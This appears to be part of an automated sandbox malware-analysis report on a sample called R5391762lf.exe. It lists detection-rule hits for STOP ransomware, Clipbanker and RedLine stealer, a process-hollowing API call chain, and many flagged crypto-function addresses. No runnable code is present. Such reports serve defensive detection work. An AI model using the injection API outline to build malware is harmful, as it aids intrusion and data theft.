Source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000005.00000002.1405143882.0000000004456000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000D.00000002.1620821652.000000000088C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.1548831250.0000000005DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000000.00000002.1373934785.0000000004498000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000002.1502845330.0000000001D0E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.1548118097.0000000004466000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.1411013560.0000000004578000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001B.00000002.2060772952.0000000000B00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000017.00000002.1792622413.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000017.00000002.1792336779.00000000044D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000013.00000002.1703479175.0000000000B3C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000020.00000002.3283516956.0000000000AC0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001E.00000002.2677244146.0000000000880000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: Process Memory Space: R5391762lf.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: R5391762lf.exe PID: 7360, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: R5391762lf.exe PID: 7500, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: R5391762lf.exe PID: 7508, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	0_2_05EA0110
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	5_2_05DB0110
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	6_2_05EC0110

Detected potential crypto function

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_00405653	0_2_00405653
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA3520	0_2_05EA3520
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA7520	0_2_05EA7520
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05ECD7F1	0_2_05ECD7F1
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAA79A	0_2_05EAA79A
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAC760	0_2_05EAC760
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAE6E0	0_2_05EAE6E0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EEB69F	0_2_05EEB69F
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAA699	0_2_05EAA699
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05ECD1A4	0_2_05ECD1A4
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EEE141	0_2_05EEE141
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA9120	0_2_05EA9120
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA70E0	0_2_05EA70E0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA30F0	0_2_05EA30F0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EB00D0	0_2_05EB00D0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAB0B0	0_2_05EAB0B0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAA026	0_2_05EAA026
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EBF030	0_2_05EBF030
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAB000	0_2_05EAB000
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA7393	0_2_05EA7393
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EEE37C	0_2_05EEE37C
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05F222C0	0_2_05F222C0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA7220	0_2_05EA7220
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA5DE7	0_2_05EA5DE7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA5DF7	0_2_05EA5DF7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EE2D1E	0_2_05EE2D1E
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05ED4E9F	0_2_05ED4E9F
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA8E60	0_2_05EA8E60
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA59F7	0_2_05EA59F7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA89D0	0_2_05EA89D0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05ECE9A3	0_2_05ECE9A3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05ECF9B0	0_2_05ECF9B0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EBA930	0_2_05EBA930
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EAA916	0_2_05EAA916
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EC18D0	0_2_05EC18D0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA7880	0_2_05EA7880
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EADBE0	0_2_05EADBE0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA2B60	0_2_05EA2B60
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EB0B00	0_2_05EB0B00
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA7A80	0_2_05EA7A80
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EACA10	0_2_05EACA10
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040D240	2_2_0040D240
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00419F90	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040C070	2_2_0040C070
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0042E003	2_2_0042E003
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00408030	2_2_00408030
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00410160	2_2_00410160
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004C8113	2_2_004C8113
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004021C0	2_2_004021C0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0044237E	2_2_0044237E
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004084C0	2_2_004084C0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004344FF	2_2_004344FF
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0043E5A3	2_2_0043E5A3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040A660	2_2_0040A660
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0041E690	2_2_0041E690
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00406740	2_2_00406740
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00402750	2_2_00402750
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040A710	2_2_0040A710
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00408780	2_2_00408780
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0042C804	2_2_0042C804
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00406880	2_2_00406880
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004349F3	2_2_004349F3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004069F3	2_2_004069F3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00402B80	2_2_00402B80
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00406B80	2_2_00406B80
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0044ACFF	2_2_0044ACFF
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0042CE51	2_2_0042CE51
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00434E0B	2_2_00434E0B
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00406EE0	2_2_00406EE0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00420F30	2_2_00420F30
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00405057	2_2_00405057
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0042F010	2_2_0042F010
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004070E0	2_2_004070E0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004391F6	2_2_004391F6
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00435240	2_2_00435240
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004C9343	2_2_004C9343
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00405447	2_2_00405447
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00405457	2_2_00405457
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00449506	2_2_00449506
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0044B5B1	2_2_0044B5B1
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00435675	2_2_00435675
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00409686	2_2_00409686
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040F730	2_2_0040F730
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0044D7A1	2_2_0044D7A1
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00481920	2_2_00481920
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0044D9DC	2_2_0044D9DC
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00449A71	2_2_00449A71
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00443B40	2_2_00443B40
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00409CF9	2_2_00409CF9
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040DD40	2_2_0040DD40
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00427D6C	2_2_00427D6C
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040BDC0	2_2_0040BDC0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00409DFA	2_2_00409DFA
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00409F76	2_2_00409F76
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0046BFE0	2_2_0046BFE0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00449FE3	2_2_00449FE3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB3520	5_2_05DB3520
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB7520	5_2_05DB7520
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DDD7F1	5_2_05DDD7F1
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBA79A	5_2_05DBA79A
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBC760	5_2_05DBC760
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBE6E0	5_2_05DBE6E0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DFB69F	5_2_05DFB69F
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBA699	5_2_05DBA699
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DDD1A4	5_2_05DDD1A4
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DFE141	5_2_05DFE141
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB9120	5_2_05DB9120
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DC00D0	5_2_05DC00D0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB30F0	5_2_05DB30F0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB70E0	5_2_05DB70E0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBB0B0	5_2_05DBB0B0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBB000	5_2_05DBB000
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DCF030	5_2_05DCF030
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBA026	5_2_05DBA026
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB7393	5_2_05DB7393
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DFE37C	5_2_05DFE37C
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05E322C0	5_2_05E322C0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB7220	5_2_05DB7220
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB5DF7	5_2_05DB5DF7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB5DE7	5_2_05DB5DE7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DF2D1E	5_2_05DF2D1E
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DE4E9F	5_2_05DE4E9F
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB8E60	5_2_05DB8E60
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB89D0	5_2_05DB89D0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB59F7	5_2_05DB59F7
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DDF9B0	5_2_05DDF9B0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DDE9A3	5_2_05DDE9A3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBA916	5_2_05DBA916
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DCA930	5_2_05DCA930
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DD18D0	5_2_05DD18D0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB7880	5_2_05DB7880
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBDBE0	5_2_05DBDBE0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB2B60	5_2_05DB2B60
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DC0B00	5_2_05DC0B00
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB7A80	5_2_05DB7A80
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DBCA10	5_2_05DBCA10
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC3520	6_2_05EC3520
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC7520	6_2_05EC7520
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EED7F1	6_2_05EED7F1
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECA79A	6_2_05ECA79A
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECC760	6_2_05ECC760
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECE6E0	6_2_05ECE6E0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05F0B69F	6_2_05F0B69F
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECA699	6_2_05ECA699
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EED1A4	6_2_05EED1A4
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05F0E141	6_2_05F0E141
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC9120	6_2_05EC9120
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC70E0	6_2_05EC70E0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC30F0	6_2_05EC30F0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ED00D0	6_2_05ED00D0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECB0B0	6_2_05ECB0B0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECA026	6_2_05ECA026
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EDF030	6_2_05EDF030
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECB000	6_2_05ECB000
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC7393	6_2_05EC7393
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05F0E37C	6_2_05F0E37C
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05F422C0	6_2_05F422C0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC7220	6_2_05EC7220
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC5DE7	6_2_05EC5DE7
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC5DF7	6_2_05EC5DF7
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05F02D1E	6_2_05F02D1E
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EF4E9F	6_2_05EF4E9F
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC8E60	6_2_05EC8E60
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC59F7	6_2_05EC59F7
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC89D0	6_2_05EC89D0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EEE9A3	6_2_05EEE9A3
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EEF9B0	6_2_05EEF9B0
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EDA930	6_2_05EDA930
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05ECA916	6_2_05ECA916
